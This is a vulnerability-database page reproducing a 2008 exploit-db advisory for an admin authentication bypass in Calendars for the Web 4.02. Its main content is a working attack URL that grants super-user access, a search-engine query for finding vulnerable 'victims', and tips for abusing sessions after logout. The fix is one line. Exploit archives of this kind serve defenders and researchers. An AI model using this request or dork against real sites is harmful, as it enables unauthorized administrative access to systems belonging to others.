Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Calendars for the Web 4.02 - Admin Authentication Bypass

🗓️ 16 Oct 2008 00:00:00Reported by SecVulnType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 36 Views

Calendars for the Web 4.02 - Admin Authentication Bypass vulnerability in the administration page, allows access, fix with a five-minute timeou

Code
*******************************************************
*Exploit discovered by SecVuln from http://secvuln.com*
*Come join our clan!                                  *
*contact [email protected]                          *
*******************************************************

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Author == SecVuln
Version == 4.02
Software == Calendars for the web by great hill corporation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Calendars for the web has a vulnerability in the administration page.
The page saves the past session, so that anyone navigating to the page has
admin access.

Exploit:

Before attack: target.com/calendarWeb/cgi-bin/calweb/calweb.exe

After attack:
target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0

Example:
target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
how to fix: set time out for login to five minutes    !
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

A Google query can find a couple pages of victims:  inurl:calweb/calweb.exe

Further hacks: if they disable the timeout you can still log in right after
they log out... You could probaly do something with that
Also the 0 at the ending is the administrator (super user) id.

/////////////////////////////////////////////////////////////////
I take no responsability for the misuse of the information.//////
Author will not be held liable for any damages             //////
COME CHECK MY SITE OUT WWW.SECVULN.COM                     //////
////////////////////////////////////////////////////////////////

# milw0rm.com [2008-10-16]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Oct 2008 00:00Current
7.4High risk
Vulners AI Score7.4
calendars for the webversion 4.02vulnerabilityadministration pageadmin accessfixtimeoutsecurity vulnerabilitysuper user
36